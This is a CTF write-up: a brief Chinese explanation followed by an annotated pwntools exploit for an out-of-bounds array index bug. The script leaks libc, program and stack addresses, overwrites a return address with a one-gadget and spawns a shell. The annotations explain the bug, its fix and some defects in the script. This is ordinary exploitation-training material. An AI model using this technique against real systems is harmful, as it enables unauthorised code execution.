这里 read 是从无符号数组开始读入，但是不能直接 read，否则会报错；
我们可以利用整数溢出来进行读入,多次爆破后利用printf泄露出环境和libc基值,然后我们可以任意地址读写 读个栈地址打通
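from pwn import *

# CTF write-up script (pwntools). The underlying program bug, per the note
# above the script, is an index into an array that is not range-checked, so
# a signed/overflowed index reaches memory outside the array; the fix on the
# program side is a bounds check on the index before it is used.
#
# Structure restored from the un-indented listing: the menu exchange is
# retried in a loop, and the rest of the script runs once a readable value
# comes back. Byte-level payloads are str literals (Python 2 pwntools style);
# under Python 3 pwntools the tube returns bytes, so the `a == 'Result:'`
# comparison would never be true — confirm the interpreter before relying on it.

context.log_level = 'debug'
context.update(terminal=['tmux', 'splitw', '-h'])

# Host/port are intentionally absent on the page; remote() without arguments
# raises, so they must be supplied when the script is run.
p = remote()

while True:
    # Menu option 2 with index 256, then option 1 again — this is the exchange
    # the note describes as the "multiple attempts" read.
    p.recvuntil('Your choice: ')
    p.sendline(str(2))
    p.recvuntil('Index: ')
    p.sendline(str(256))
    p.recvuntil('Your choice: ')
    p.sendline(str(1))
    p.recvuntil('Index: ')
    try:
        a = p.recvuntil('Result:')
    except Exception:
        # Was a bare `except:`; `Exception` keeps the retry behaviour but
        # lets KeyboardInterrupt stop the loop.
        continue
    if a == 'Result:':
        # Nothing preceded the marker; the original closes the tube and
        # retries. NOTE(review): after close() the next iteration reads from
        # the closed tube and raises outside the try — a reconnect is needed
        # here, but the target host/port are not on the page.
        p.close()
        continue

    # A usable read came back: first value is a libc address (read), from
    # which the libc base and environ are derived using the page's offsets
    # (presumably specific to the challenge's libc build).
    payload = '\xe9' + '\xff' * 7
    p.sendline(payload)
    read_addr = int(p.recvline()[8:], 16)
    libc_base = read_addr - 0x110140
    environ_addr = libc_base + 0x3ee098

    # Second read: program base (page offset 0xa00) and the array address.
    payload = '\xa4' + '\xff' * 7
    p.sendafter('Your choice: ', str(1))
    p.sendafter('Index: ', payload)
    base = int(p.recvline()[8:], 16) - 0xa00
    zhi_add = base + 0x202060

    # Third read: a stack address via environ, expressed as a signed
    # element index relative to the array.
    payload = p64((environ_addr - zhi_add) // 8, signed=True)
    p.sendlineafter('Your choice: ', str(1))
    p.sendafter('Index: ', payload)
    stack_addr = int(p.recvline()[8:], 16)
    write_base = stack_addr - 0x120

    # Final write through option 2, then hand the tube to the user.
    p.sendlineafter('Your choice: ', str(2))
    p.sendlineafter('Index: ', str((write_base - zhi_add) // 8))
    p.send(p64(libc_base + 0x10a41c))
    # Original called `io.interactive()`, but `io` is never defined; the
    # tube variable is `p`. Leave the loop afterwards instead of re-entering
    # the menu exchange on a tube that has already been handed over.
    p.interactive()
    break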